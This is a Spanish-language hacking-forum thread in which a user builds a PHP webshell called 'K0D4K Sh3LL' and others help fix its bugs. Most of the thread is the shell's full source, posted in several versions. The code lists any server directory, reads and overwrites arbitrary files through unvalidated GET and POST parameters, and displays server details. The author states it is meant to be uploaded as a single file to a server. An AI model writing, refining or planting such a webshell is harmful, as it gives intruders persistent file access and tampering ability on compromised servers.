Hola gente, estoy realizando una webshell y me surgio un problema, la webshell la pantalla principal consta de un menu para ver archivos info del servidor y creditos
bueno el problema es que cuando voy a la parte de de informacion del servidor se mete tambien lo que hay en menu :(
lo mejor va a ser que lo vean..
les dejo el codigo
<html>
<head>
<title> K0D4K Sh3LL! </title>
<style type="text/css">
body {
background-color:#000000;
cursor:crosshair;
font-family:monospace;
}
datitos{
color:FF0000;
font-weight:bold;
font-family:verdana;
font-size:15px;
}
carteles {
font-size:20px;
color:#FF8000;
font-weight:bold;
}
directorios{
font-size:small;
font-type:Comic Sans Ms;
font-color:red;
font-family:verdana;
font-weight:bold;
}
table
{
font-size:13px;
border-collapse: collapse;
}
th
{
border-right: 1px solid #000;
border-bottom: 1px solid #000;
padding: 0.5em;
background-color:#FF8000;
}
corchetes {
color:#FF0000;
font-family:verdana;
font-size:26px;
font-weight:bold;
font-style:italic;
}
signos {
font-weight:bold;
color:#FF8000;
font-size:24px;
}
k{
color:#FF0000;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}
cero{
color:#FF8000;
font-size:23px;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}
guion{
color:#FF8000;
font-size:25px;
}
a:link {
font-size:15px;
color:red;
text-decoration:none;
}
a:visited{
color:red;
text-decoration:none;
}
a:hover {
cursor:crosshair;
color:orange;
text-decoration:none;
font-size:16px;
}
datos{
font-size:medium;
color:#FF8000;
font-family:verdana;
}
</style>
<title> K0D4K Web Sh3LL! </title>
</head>
<body>
<center>
<corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes>
<k> K</k> <cero>0</cero> <k>D</k> <cero>4</cero> <k>K</k> <guion>-</guion> <k>S</k> <cero>H</cero> <k>3</k> <cero>L</cero> <k>L</k> <corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes></center>
<br><br> <center>
<center> <br><br>
<div style="bottom: 50%%; width: 60%; left: 23%; right: 7%; top: 28%;
visibility: visible; z-index:10; font-family: Courier New; background-color: #000000;border:1.5px orange dashed; text-decoration: none; text-aling: center;">
<center> <br>
<a href="?shell=archivo"> Ver Archivos </a><br>
<a href="?shell=datos"> Informacion Del Servidor </a><br>
<a href="?shell=phpinfo"> Link3</a> <br>
<a href="?shell=creditos">Creditos</a> <br>
</div></center></center>
<br>
<?php
if(isset($_GET['path'])) {
$path = $_GET['path'];
$dir = dir($path);
}
else {
$path = getcwd();
$dir = dir($path);
}
if($_GET['shell'] == "archivo" or $_GET['path']!== "") {
echo "<br>";
echo "<div align=right>";
echo "<table><tr>";
echo "<th>Posicion:</th><th>";
echo "$path";
echo "</th>";
echo "</table>";
echo "</div>";
echo "</chica>";
echo "<br>";
echo "<center>";
echo "<carteles><br>";
echo "Directorios:<br>";
"</carteles>";
$contador = 0;
while ($file = $dir->read()) {
$extension = filetype($path."/".$file);
if ($extension == "dir") {
$contador+=1;
$ruta = urlencode($path."/".$file);
echo "<directorios>";
echo "<a href=?path=".$ruta.">".$file."</a><br>";
}
}
echo "</directorios>";
echo "<br><br><carteles>";
echo "Archivos:";
echo "</carteles><br>";
$dir->rewind();
$contador=0;
while($file = $dir->read()) {
$extension=filetype($path."/".$file);
if ($extension !=="dir") {
$contador+=1;
$ruta=urlencode($path."/".$file);
echo "<directorios>";
echo "<a href=?view=".$ruta.">".$file."</a><br>";}}
if ($contador==0) {
echo "No hay archivos en el directorio";
}
echo "<br><br>";
echo "</center>";
$dir->close();
echo "</directorios>";
if(isset($_GET['view'])) {
$ruta = $_GET['view'];
echo "<h2><font color=orange><center>";
echo "Editando: $ruta";
echo "</font></center></h2>";
echo "<center>";
echo "<form method=POST action=\"\">";
echo "<div style=133%><textarea name=\"modi\" cols=35 rows=15>";
$abrir=fopen($ruta,"r");
$texto = fread($abrir, filesize($ruta));
echo htmlentities($texto);
echo "</textarea></div>";
echo "<input type=submit name=\"Change\" value=\"Editar\">";
echo "</form>";
echo "</center>";
if(isset($_POST['Change'])) {
$arc=fopen($ruta, "w+");
$txt=$_POST['modi'];
@$ok = fwrite($arc,$txt);
}
}
}
?>
<?php
if($_GET['shell']=="datos") {
echo "<br><br><br>";
$servers=$_SERVER['SERVER_SOFTWARE'];
$ipserver=$_SERVER['SERVER_ADDR'];
$lugarshell=$_SERVER['SCRIPT_FILENAME'];
echo "<carteles>";
echo "Datos del servidor:";
echo "</carteles>";
echo "<br><br><br>";
echo "<datos>";
echo "Version de software: ";
echo "</datos>";
echo "<datitos>";
echo $servers;
echo "</datitos>";
echo "</info>";
echo "<br>";
echo "<datos>";
echo "IP del servidor: ";
echo "</datos>";
echo "<datitos>";
echo $ipserver;
echo "</datitos>";
echo "<br>";
echo "<datos>";
echo "Directorio shell: ";
echo "</datos>";
echo "<datitos>";
echo $lugarshell;
echo "</datitos>";
}
?>
<?php
if($_GET['shell'] == "creditos") {
header("location: http://www.kodakwebshell.blogspot.com/search/labels/creditos");
}
?>
</body>
</html>
muchas gracias
bueno tu codigo esmuy desordenado xD
intenta hacer algo asi modular, separa cada funcion en archivos distintos php
pero mantiene el menu de arriba
si get[shell]==archivo
include archivo.php
si get[shell]==informacion
include serverinfo.php
si get[shell]==blablabla
include blabla.php
El problema que tienes radica en la siguiente linea de código
if($_GET['shell'] == "archivo" or $_GET['path']!== "") {
Donde realizas una comparación con la variable GET path, que si se encuentra vacía, muestre ciertos echos. Es decir, cambia esa linea por está
if($_GET['shell'] == "archivo") {
Te dejo el código completo, un poco más ordenado.
<html>
<head>
<title> K0D4K Sh3LL! </title>
<style type="text/css">
body {
background-color:#000000;
cursor:crosshair;
font-family:monospace;
}
datitos{
color:FF0000;
font-weight:bold;
font-family:verdana;
font-size:15px;
}
carteles {
font-size:20px;
color:#FF8000;
font-weight:bold;
}
directorios{
font-size:small;
font-type:Comic Sans Ms;
font-color:red;
font-family:verdana;
font-weight:bold;
}
table{
font-size:13px;
border-collapse: collapse;
}
th{
border-right: 1px solid #000;
border-bottom: 1px solid #000;
padding: 0.5em;
background-color:#FF8000;
}
corchetes {
color:#FF0000;
font-family:verdana;
font-size:26px;
font-weight:bold;
font-style:italic;
}
signos {
font-weight:bold;
color:#FF8000;
font-size:24px;
}
k{
color:#FF0000;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}
cero{
color:#FF8000;
font-size:23px;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}
guion{
color:#FF8000;
font-size:25px;
}
a:link {
font-size:15px;
color:red;
text-decoration:none;
}
a:visited{
color:red;
text-decoration:none;
}
a:hover {
cursor:crosshair;
color:orange;
text-decoration:none;
font-size:16px;
}
datos{
font-size:medium;
color:#FF8000;
font-family:verdana;
}
</style>
<title> K0D4K Web Sh3LL! </title>
</head>
<body>
<center>
<corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes>
<k> K</k> <cero>0</cero> <k>D</k> <cero>4</cero> <k>K</k> <guion>-</guion> <k>S</k> <cero>H</cero> <k>3</k> <cero>L</cero> <k>L</k> <corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes></center>
<br><br> <center>
<center> <br><br>
<div style="bottom: 50%%; width: 60%; left: 23%; right: 7%; top: 28%;
visibility: visible; z-index:10; font-family: Courier New; background-color: #000000;border:1.5px orange dashed; text-decoration: none; text-aling: center;">
<center> <br>
<a href="?shell=archivo"> Ver Archivos </a><br>
<a href="?shell=datos"> Informacion Del Servidor </a><br>
<a href="?shell=phpinfo"> Link3</a> <br>
<a href="?shell=creditos">Creditos</a> <br>
</div></center></center>
<br>
<?php
if(isset($_GET['path'])) {
$path = $_GET['path'];
$dir = dir($path);
}else {
$path = getcwd();
$dir = dir($path);
}
if($_GET['shell'] == "archivo") {
echo "<br>";
echo "<div align=right>";
echo "<table><tr>";
echo "<th>Posicion:</th><th>";
echo "$path";
echo "</th>";
echo "</table>";
echo "</div>";
echo "</chica>";
echo "<br>";
echo "<center>";
echo "<carteles><br>";
echo "Directorios:<br>";
echo "</carteles>";
$contador = 0;
while ($file = $dir->read()) {
$extension = filetype($path."/".$file);
if ($extension == "dir") {
$contador+=1;
$ruta = urlencode($path."/".$file);
echo "<directorios>";
echo "<a href=?path=".$ruta.">".$file."</a><br>";
}
}
echo "</directorios>";
echo "<br><br><carteles>";
echo "Archivos:";
echo "</carteles><br>";
$dir->rewind();
$contador=0;
while($file = $dir->read()) {
$extension=filetype($path."/".$file);
if ($extension !=="dir"){
$contador+=1;
$ruta=urlencode($path."/".$file);
echo "<directorios>";
echo "<a href=?view=".$ruta.">".$file."</a><br>";
}
}
if ($contador==0) {
echo "No hay archivos en el directorio";
}
echo "<br><br>";
echo "</center>";
$dir->close();
echo "</directorios>";
if(isset($_GET['view'])) {
$ruta = $_GET['view'];
echo "<h2><font color=orange><center>";
echo "Editando: $ruta";
echo "</font></center></h2>";
echo "<center>";
echo "<form method=POST action=\"\">";
echo "<div style=133%><textarea name=\"modi\" cols=35 rows=15>";
$abrir=fopen($ruta,"r");
$texto = fread($abrir, filesize($ruta));
echo htmlentities($texto);
echo "</textarea></div>";
echo "<input type=submit name=\"Change\" value=\"Editar\">";
echo "</form>";
echo "</center>";
if(isset($_POST['Change'])) {
$arc=fopen($ruta, "w+");
$txt=$_POST['modi'];
@$ok = fwrite($arc,$txt);
}
}
}
if($_GET['shell']=="datos") {
echo "<br><br><br>";
$servers=$_SERVER['SERVER_SOFTWARE'];
$ipserver=$_SERVER['SERVER_ADDR'];
$lugarshell=$_SERVER['SCRIPT_FILENAME'];
echo "<carteles>";
echo "Datos del servidor:";
echo "</carteles>";
echo "<br><br><br>";
echo "<datos>";
echo "Version de software: ";
echo "</datos>";
echo "<datitos>";
echo $servers;
echo "</datitos>";
echo "</info>";
echo "<br>";
echo "<datos>";
echo "IP del servidor: ";
echo "</datos>";
echo "<datitos>";
echo $ipserver;
echo "</datitos>";
echo "<br>";
echo "<datos>";
echo "Directorio shell: ";
echo "</datos>";
echo "<datitos>";
echo $lugarshell;
echo "</datitos>";
}
if($_GET['shell'] == "creditos") {
header("location: http://www.kodakwebshell.blogspot.com/search/labels/creditos");
}
?>
</body>
</html>
Edit: Tú WEBSHELL tiene XSS. xD
gracias por las rapidas respuestas, yo habia hecho lo mismo que tu shell root, va, esa fue mi primer idea, pero al ver lo que pasaba intente meter otra cosa..
lo que pasa con eso es que cuando intentas navegar por los directorios, te lleva a la pagina principal, osea no navega por los directorio..
si get[shell]==archivo
include archivo.php
si get[shell]==informacion
include serverinfo.php
si get[shell]==blablabla
include blabla.php
Eso estaria bueno, pero en una webshell no puedo subir muchos archivos al servidor, la gracia de la webshell es que sea un solo archivo :)
saludos
>:D
¿? jajjaja que fue esa cara xD
No entiendo el sentido de usar varios if cuando podes usar una función para eso...
:silbar:
Switch()
http://php.net/manual/es/control-structures.switch.php
Ejemplo:
switch($_GET[algo]){
case hola:
echo 'Chau';
break;
case chau:
echo 'Hola';
break;
default:
echo 'pagina principal';
}
Espero que te sirva ;)
Y no hay necesidad de subir varios archivos al servidor, aun que estes usando if, dependiendo el caso pones el codigo php que se ejecute, pero de forma ordenada :silbar:
Suerte, cualquier cosa mandame un privado ;)
ya conozco el tema del switch :) muchas gracias, pero el error sigue saliendo igual, sospecho que nadie se molesto en compilar el script y ver que pasa :/
saludos
PD: sigue estando el mismo error
Cita de: frankitox en 1 Agosto 2010, 13:40 PM...sospecho que nadie se molesto en compilar el script y ver que pasa :/
Sospechas bien ;). Creo que deberías de leer esto y reestructurar la idea de la WebShell.
:http://foro.portalhacker.net/index.php/topic,70671.0.html
yo si lo probe cuado postie xD
Ya se lo solucione ayer por privado ;)
:silbar:
Muchas gracias zazú, les dejo el codigo y algo que esta molestando :
<html>
<head>
<title> K0D4K Sh3LL! </title>
<style type="text/css">
body {
background-color:#000000;
cursor:crosshair;
font-family:monospace;
}
datitos{
color:FF0000;
font-weight:bold;
font-family:verdana;
font-size:15px;
}
carteles {
font-size:20px;
color:#FF8000;
font-weight:bold;
}
directorios{
font-size:small;
font-type:Comic Sans Ms;
font-color:red;
font-family:verdana;
font-weight:bold;
}
table
{
font-size:13px;
border-collapse: collapse;
}
th
{
border-right: 1px solid #000;
border-bottom: 1px solid #000;
padding: 0.5em;
background-color:#FF8000;
}
corchetes {
color:#FF0000;
font-family:verdana;
font-size:26px;
font-weight:bold;
font-style:italic;
}
signos {
font-weight:bold;
color:#FF8000;
font-size:24px;
}
k{
color:#FF0000;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}
cero{
color:#FF8000;
font-size:23px;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}
guion{
color:#FF8000;
font-size:25px;
}
a:link {
font-size:15px;
color:red;
text-decoration:none;
}
a:visited{
color:red;
text-decoration:none;
}
a:hover {
cursor:crosshair;
color:orange;
text-decoration:none;
font-size:16px;
}
datos{
font-size:medium;
color:#FF8000;
font-family:verdana;
}
</style>
<title> K0D4K Web Sh3LL! </title>
</head>
<body>
<center>
<corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes>
<k> K</k> <cero>0</cero> <k>D</k> <cero>4</cero> <k>K</k> <guion>-</guion> <k>S</k> <cero>H</cero> <k>3</k> <cero>L</cero> <k>L</k> <corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes></center>
<br><br> <center>
<center> <br><br>
<div style="bottom: 50%%; width: 60%; left: 23%; right: 7%; top: 28%;
visibility: visible; z-index:10; font-family: Courier New; background-color: #000000;border:1.5px orange dashed; text-decoration: none; text-aling: center;">
<center> <br>
<a href="?shell=archivo"> Ver Archivos </a><br>
<a href="?shell=datos"> Informacion Del Servidor </a><br>
<a href="?shell=phpinfo"> Link3</a> <br>
<a href="?shell=creditos">Creditos</a> <br>
</div></center></center>
<br>
<?php
if($_GET['shell']=="datos") { // si lo devuelto por shell == datos
$ROOT=$_SERVER["DOCUMENT_ROOT"]; // variable para saber donde esta instalado el wamp
$SADMIN=$_SERVER["SERVER_ADMIN"]; //mail admin
$SELF=$_SERVER["PHP_SELF"]; //
$servers=$_SERVER['SERVER_SOFTWARE']; //version del software
$ipserver=$_SERVER['SERVER_ADDR']; //ip del serviodr
$lugarshell=$_SERVER['SCRIPT_FILENAME']; //lugar donde esta nuestro archivo
$sname = $_SERVER['SERVER_NAME']; // nombre del servidor
$port= $_SERVER['SERVER_PORT']; //puerto para realizar la conexion
$hconection= $_SERVER['HTTP_CONNECTION'];
$haceptlanguaje=$_SERVER['HTTP_ACCEPT_LANGUAGE']; //header accept-language
$hencoding=$_SERVER['HTTP_ACCEPT_ENCODING']; //header encoding
$hcharset =$_SERVER['HTTP_ACCEPT_CHARSET']; // header charset
$hmetod =$_SERVER['REQUEST_METHOD']; // header method
$hproto = $_SERVER['SERVER_PROTOCOL'];
echo "<br><br><br><br>";
echo "<carteles>";
echo "Datos del servidor:";
echo "</carteles>";
echo "<br><br><br>";
echo "<datos>";
echo "Version de software: ";
echo "</datos>";
echo "<datitos>";
echo $servers;
echo "</datitos>";
echo "</info>";
echo "<br>";
echo "<datos>";
echo "IP del servidor: ";
echo "</datos>";
echo "<datitos>";
echo $ipserver;
echo "</datitos>";
echo "<br>";
echo "<datos>";
echo "Server name: ";
echo "</datos>";
echo "<datitos>";
echo $sname;
echo "</datitos>";
echo "<br>";
echo "<datos>";
echo "Instalado en: ";
echo "</datos>";
echo "<datitos>";
echo $ROOT;
echo "</datitos><br>";
echo "<datos>";
echo "Directorio shell: ";
echo "</datos>";
echo "<datitos>";
echo $lugarshell;
echo "</datitos>";
echo "<datos><BR>";
echo "Mail Admin: ";
echo "</datos>";
echo "<datitos>";
echo $SADMIN;
echo "</datitos><BR>";
echo "<datos>";
echo "Puerto usado para la conexion: ";
echo "</datos>";
echo "<datitos>";
echo $port;
echo "</datitos>";
echo "</info>";
echo "<br><br><br>";
echo "<carteles>";
echo "Headers:<br><br>";
echo "</carteles>";
echo "<datos>";
echo "Header Connection: ";
echo "</datos>";
echo "<datitos>";
echo $hconection;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Header Accept-Language: ";
echo "</datos>";
echo "<datitos>";
echo $haceptlanguaje;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Header Encoding: ";
echo "</datos>";
echo "<datitos>";
echo $hencoding;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Header Accept-Charset: ";
echo "</datos>";
echo "<datitos>";
echo $hcharset;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Header Method: ";
echo "</datos>";
echo "<datitos>";
echo $hmetod;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Protocol Version: ";
echo "</datos>";
echo "<datitos>";
echo $hproto;
echo "</datitos>";
echo "</info><br>";
} //cierro if de si shell == datos
else { //de lo contrario (si shell no es == datos
if(isset($_GET['path'])) { // si la variable path tiene algo
$path = $_GET['path']; //almaceno en path lo devuelvo por $_get[path]
$dir = dir($path); // dir = dir(ruta que devolvio get
} // cierro if
else { // de lo contrario si no esta definido get path
$path = getcwd(); //$path toma el valor del directorio actual
$dir = dir($path);
} //cierro else
if($_GET['shell'] == "archivo" OR $_GET['path']!== "" ) {
echo "<br>";
echo "<div align=right>";
echo "<table><tr>";
echo "<th>Posicion:</th><th>";
echo "$path";
echo "</th>";
echo "</table>";
echo "</div>";
echo "</chica>";
echo "<br>";
echo "<center>";
echo "<carteles><br>";
echo "Directorios:<br>";
"</carteles>";
$contador = 0;
while ($file = $dir->read()) {
$extension = filetype($path."/".$file);
if ($extension == "dir") {
$contador+=1;
$ruta = urlencode($path."/".$file);
echo "<directorios>";
echo "<a href=?path=".$ruta.">".$file."</a><br>";
}
}
echo "</directorios>";
echo "<br><br><carteles>";
echo "Archivos:";
echo "</carteles><br>";
$dir->rewind();
$contador=0;
while($file = $dir->read()) {
$extension=filetype($path."/".$file);
if ($extension !=="dir") {
$contador+=1;
$ruta=urlencode($path."/".$file);
echo "<directorios>";
echo "<a href=?view=".$ruta.">".$file."</a><br>";}}
if ($contador==0) {
echo "No hay archivos en el directorio";
}
echo "<br><br>";
echo "</center>";
$dir->close();
echo "</directorios>";
if(isset($_GET['view'])) {
$ruta = $_GET['view'];
echo "<h2><font color=orange><center>";
echo "Editando: $ruta";
echo "</font></center></h2>";
echo "<center>";
echo "<form method=POST action=\"\">";
echo "<div style=133%><textarea name=\"modi\" cols=35 rows=15>";
$abrir=fopen($ruta,"r");
$texto = fread($abrir, filesize($ruta));
echo htmlentities($texto);
echo "</textarea></div>";
echo "<input type=submit name=\"Change\" value=\"Editar\">";
echo "</form>";
echo "</center>";
if(isset($_POST['Change'])) {
$arc=fopen($ruta, "w+");
$txt=$_POST['modi'];
@$ok = fwrite($arc,$txt);
}
}
}
if($_GET['shell'] == "creditos") {
header("location: http://www.kodakwebshell.blogspot.com/search/labels/creditos");
}
}
?>
</body>
</html>
Bueno, les comento el problema:
al ir a la pestaña informacion del servidor, ningun problema, pero
cuando vamos a ver archivos y empezamos a explorar rutas, saltan diferentes errores:
Notice: Undefined index: shell in C:\wamp\www\shel\kodak.php on line 133
Notice: Undefined index: shell in C:\wamp\www\shel\kodak.php on line 259
y cuando utilizamos la variable view= para modificar los archivos estos:
Notice: Undefined index: shell in C:\wamp\www\shel\kodak.php on line 133
Notice: Undefined index: shell in C:\wamp\www\shel\kodak.php on line 259
Notice: Undefined index: path in C:\wamp\www\shel\kodak.php on line 259
ya se que me van a decir, es que no definiste las variables, pero el problema es qe no se como hacerlo, ya probe añadiendo un par de OR a las sentencias anteriores y nada :/
Muchas gracias :)w
disculpen que reabra el tema :=( :-[
saludos :D
Por lo menos YO, no miraré el código, hasta que por lo menos lo tengas ordenado. Es muy difícil verlo así como lo tienes. Además de especificar las lineas en las que se dá el error.
Shell te ordene el code ;) cuando tenngas un minuto, mira el post anterior y respondeme :silbar: jaja
<html>
<head>
<title> K0D4K Sh3LL! </title>
<style type="text/css">
body {
background-color:#000000;
cursor:crosshair;
font-family:monospace;
}
datito {
color:FF0000;
font-weight:bold;
font-family:verdana;
font-size:15px;
}
cartele {
font-size:20px;
color:#FF8000;
font-weight:bold;
}
directorio {
font-size:small;
font-type:Comic Sans Ms;
font-color:red;
font-family:verdana;
font-weight:bold;
}
table {
font-size:13px;
border-collapse: collapse;
}
th {
border-right: 1px solid #000;
border-bottom: 1px solid #000;
padding: 0.5em;
background-color:#FF8000;
}
corchetes {
color:#FF0000;
font-family:verdana;
font-size:26px;
font-weight:bold;
font-style:italic;
}
signos {
font-weight:bold;
color:#FF8000;
font-size:24px;
}
k {
color:#FF0000;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}
cero {
color:#FF8000;
font-size:23px;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}
guion {
color:#FF8000;
font-size:25px;
}
a:link {
font-size:15px;
color:red;
text-decoration:none;
}
a:visited {
color:red;
text-decoration:none;
}
a:hover {
cursor:crosshair;
color:orange;
text-decoration:none;
font-size:16px;
}
datos {
font-size:medium;
color:#FF8000;
font-family:verdana;
}
</style>
</head>
<body>
<center>
<corchetes>[</corchetes> <signos>!</signos> <corchetes>]</corchetes> <k> K</k> <cero>0</cero> <k>D</k>
<cero>4</cero> <k>K</k> <guion>-</guion> <k>S</k> <cero>H</cero> <k>3</k> <cero>L</cero> <k>L</k> <corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes></center>
<br><br>
</center>
<center>
<br>
<br>
<div style="bottom: 50%%; width: 60%; left: 23%; right: 7%; top: 28%;
visibility: visible; z-index:10; font-family: Courier New; background-color: #000000;border:1.5px orange dashed; text-decoration: none; text-aling: center;">
<br>
<a href="?shell=archivo"> Ver Archivos</a>
<br>
<a href="?shell=datos"> Informacion Del Servidor</a>
<br>
<a href="?shell=phpinfo"> Link3</a>
<br>
<a href="?shell=creditos">Creditos</a>
<br>
</div>
</center>
</center>
<br>
<?php
if($_GET['shell']=="datos") { // si lo devuelto por shell == datos
$ROOT=$_SERVER["DOCUMENT_ROOT"]; // variable para saber donde esta instalado el wamp
$SADMIN=$_SERVER["SERVER_ADMIN"]; //mail admin
$SELF=$_SERVER["PHP_SELF"]; //
$servers=$_SERVER['SERVER_SOFTWARE']; //version del software
$ipserver=$_SERVER['SERVER_ADDR']; //ip del serviodr
$lugarshell=$_SERVER['SCRIPT_FILENAME']; //lugar donde esta nuestro archivo
$sname = $_SERVER['SERVER_NAME']; // nombre del servidor
$port= $_SERVER['SERVER_PORT']; //puerto para realizar la conexion
$hconection= $_SERVER['HTTP_CONNECTION'];
$haceptlanguaje=$_SERVER['HTTP_ACCEPT_LANGUAGE']; //header accept-language
$hencoding=$_SERVER['HTTP_ACCEPT_ENCODING']; //header encoding
$hcharset =$_SERVER['HTTP_ACCEPT_CHARSET']; // header charset
$hmetod =$_SERVER['REQUEST_METHOD']; // header method
$hproto = $_SERVER['SERVER_PROTOCOL'];
echo "<br><br><br><br>";
echo "<carteles>";
echo "Datos del servidor:";
echo "</carteles>";
echo "<br><br><br>";
echo "<datos>";
echo "Version de software: ";
echo "</datos>";
echo "<datitos>";
echo $servers;
echo "</datitos>";
echo "</info>";
echo "<br>";
echo "<datos>";
echo "IP del servidor: ";
echo "</datos>";
echo "<datitos>";
echo $ipserver;
echo "</datitos>";
echo "<br>";
echo "<datos>";
echo "Server name: ";
echo "</datos>";
echo "<datitos>";
echo $sname;
echo "</datitos>";
echo "<br>";
echo "<datos>";
echo "Instalado en: ";
echo "</datos>";
echo "<datitos>";
echo $ROOT;
echo "</datitos><br>";
echo "<datos>";
echo "Directorio shell: ";
echo "</datos>";
echo "<datitos>";
echo $lugarshell;
echo "</datitos>";
echo "<datos><BR>";
echo "Mail Admin: ";
echo "</datos>";
echo "<datitos>";
echo $SADMIN;
echo "</datitos><BR>";
echo "<datos>";
echo "Puerto usado para la conexion: ";
echo "</datos>";
echo "<datitos>";
echo $port;
echo "</datitos>";
echo "</info>";
echo "<br><br><br>";
echo "<carteles>";
echo "Headers:<br><br>";
echo "</carteles>";
echo "<datos>";
echo "Header Connection: ";
echo "</datos>";
echo "<datitos>";
echo $hconection;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Header Accept-Language: ";
echo "</datos>";
echo "<datitos>";
echo $haceptlanguaje;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Header Encoding: ";
echo "</datos>";
echo "<datitos>";
echo $hencoding;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Header Accept-Charset: ";
echo "</datos>";
echo "<datitos>";
echo $hcharset;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Header Method: ";
echo "</datos>";
echo "<datitos>";
echo $hmetod;
echo "</datitos>";
echo "</info><br>";
echo "<datos>";
echo "Protocol Version: ";
echo "</datos>";
echo "<datitos>";
echo $hproto;
echo "</datitos>";
echo "</info><br>";
}
else {
if(isset($_GET['path'])) {
$path = $_GET['path'];
$dir = dir($path);
}
else {
$path = getcwd();
$dir = dir($path);
}
if($_GET['shell'] == "archivo" OR $_GET['path']!== "" ) {
echo "<br>";
echo "<div align=right>";
echo "<table><tr>";
echo "<th>Posicion:</th><th>";
echo "$path";
echo "</th>";
echo "</table>";
echo "</div>";
echo "</chica>";
echo "<br>";
echo "<center>";
echo "<carteles><br>";
echo "Directorios:<br>";
echo "</carteles>";
$contador = 0;
while ($file = $dir->read()) {
$extension = filetype($path."/".$file);
if ($extension == "dir") {
$contador+=1;
$ruta = urlencode($path."/".$file);
echo "<directorios>";
echo "<a href=?path=".$ruta.">".$file."</a><br>";
}
}
echo "</directorios>";
echo "<br><br><carteles>";
echo "Archivos:";
echo "</carteles><br>";
$dir->rewind();
$contador=0;
while($file = $dir->read()) {
$extension=filetype($path."/".$file);
if ($extension !=="dir") {
$contador+=1;
$ruta=urlencode($path."/".$file);
echo "<directorios>";
echo "<a href=?view=".$ruta.">".$file."</a><br>";}}
if ($contador==0) {
echo "No hay archivos en el directorio";
}
echo "<br><br>";
echo "</center>";
$dir->close();
echo "</directorios>";
if(isset($_GET['view'])) {
$ruta = $_GET['view'];
echo "<h2><font color=orange><center>";
echo "Editando: $ruta";
echo "</font></center></h2>";
echo "<center>";
echo "<form method=POST action=\"\">";
echo "<div style=133%><textarea name=\"modi\" cols=35 rows=15>";
$abrir=fopen($ruta,"r");
$texto = fread($abrir, filesize($ruta));
echo htmlentities($texto);
echo "</textarea></div>";
echo "<input type=submit name=\"Change\" value=\"Editar\">";
echo "</form>";
echo "</center>";
if(isset($_POST['Change'])) {
$arc=fopen($ruta, "w+");
$txt=$_POST['modi'];
@$ok = fwrite($arc,$txt);
}
}
}
if($_GET['shell'] == "creditos") {
header("location: http://www.kodakwebshell.blogspot.com/search/labels/creditos");
}
} //cierro el primer if de control
?>
</body>
</html>
Por cierto los errores se encuentran en:
Notice: Undefined index: shell in C:\wamp\www\shel\kodak.php on line 161
Notice: Undefined index: shell in C:\wamp\www\shel\kodak.php on line 291
Notice: Undefined index: path in C:\wamp\www\shel\kodak.php on line 291
line 161:
if($_GET['shell']=="datos") {
line 291:
if($_GET['shell'] == "archivo" OR $_GET['path']!== "" ) {
Saludos :) ;-)
jjojo que raro a mí no me aparece ningún error.